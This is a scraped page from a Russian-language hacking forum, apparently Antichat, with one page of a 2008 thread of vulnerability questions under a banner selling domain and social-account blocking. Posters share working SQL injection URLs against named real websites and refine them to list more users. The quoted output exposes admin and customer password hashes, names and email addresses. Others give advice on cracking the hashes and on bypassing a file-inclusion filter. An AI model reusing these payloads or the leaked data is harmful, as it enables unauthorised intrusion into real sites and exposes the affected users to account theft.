УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 90 из 2438

Опции темы

Поиск в этой теме

Опции просмотра

#891

06.02.2008, 23:59

~~Conquerstador~~

Banned

Регистрация: 07.07.2007

Сообщений: 152

Провел на форуме:
511131

Репутация: 52

Отправить сообщение для Conquerstador с помощью ICQ

Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!

#892

07.02.2008, 00:09

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

Отправить сообщение для CaNNabi$ с помощью ICQ

Цитата:

Сообщение от Conquerstador

Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!

Вводил пассы от MySQL базы тоже нифига)

#893

07.02.2008, 23:53

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

Я первый раз занимаюсь SQL инекцией

Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100%

Код HTML:

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4,5,6%20from%20wp_users--

и там вот это потом написано

Edit event admin:cd59cc41aa03d53c9336522d40ee4339:bradley@ris eup.net

cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь)

Это моя первая тема про SQL так что не пинайте)

Спасибо за внимание

Последний раз редактировалось CaNNabi$; 07.02.2008 в 23:59..

#894

07.02.2008, 23:57

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--

#895

08.02.2008, 00:00

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

Цитата:

Сообщение от ElteRUS

Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк)
Терь моно в раздел SQL инекций добавлять)

Последний раз редактировалось CaNNabi$; 08.02.2008 в 00:03..

#896

08.02.2008, 00:38

CaNNabi$

Познающий

Регистрация: 21.01.2008

Сообщений: 85

Провел на форуме:
839509

Репутация: 338

А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?)

Повторяю я новичок в этом деле

#897

08.02.2008, 00:59

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

угу, от админки ворд пресса

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#898

08.02.2008, 02:11

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

у меня такая ситуация:
index.php?d=files&p=../index
инклудится индекс. Видно, что добавляется .php в конец.
index.php?d=files&p=../index.php%00
index.php?d=files&p=../index.php?
index.php?d=files&p=../index.php//
не прокатывает! Ошибку выдёт. Там Винда стоит.
Есть ли шанс приишклудить файл с другим расширением, отличным от php?

#899

08.02.2008, 02:16

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#900

08.02.2008, 07:03

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

Цитата:

http://www.site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль?

Weinstein:425207c6e60ffa47065702619d9a8e76:aa:happ iquilter@verizon.net

Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:bizzybe adz@gmail.com

Страница 90 из 2438

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход